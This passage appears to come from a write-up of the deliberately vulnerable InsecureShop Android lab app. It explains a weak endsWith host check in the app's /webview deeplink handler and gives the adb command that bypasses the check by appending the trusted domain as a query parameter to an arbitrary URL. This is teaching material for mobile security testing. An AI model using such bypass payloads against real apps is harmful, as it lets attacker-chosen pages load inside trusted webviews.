😄Vulnerability #6: Weak Host Validation

Now let’s focus on the else if block when the path supplied in a deeplink is /webview. Similar to the previous vulnerability, it retrieves data from the intent -> gets the ?url query parameter.

However, there is an additional step to check if the url we retrieved endswith the string insecureshopapp.com. This may be a mechanism implemented by developers to only allow opening urls that they own. However, this is vulnerable since we can easily bypass the check:

C:\Users\Aniket\Downloads\InsecureShop-Writeup>adb shell am start -a android.intent.action.VIEW -c android.intent.category.BROWSABLE -d insecureshop://com.insecureshop/webview?url=https://google.com/?ignore=insecureshopapp.com
Starting: Intent { act=android.intent.action.VIEW cat=[android.intent.category.BROWSABLE] dat=insecureshop://com.insecureshop/webview?url=https://google.com/?ignore=insecureshopapp.com }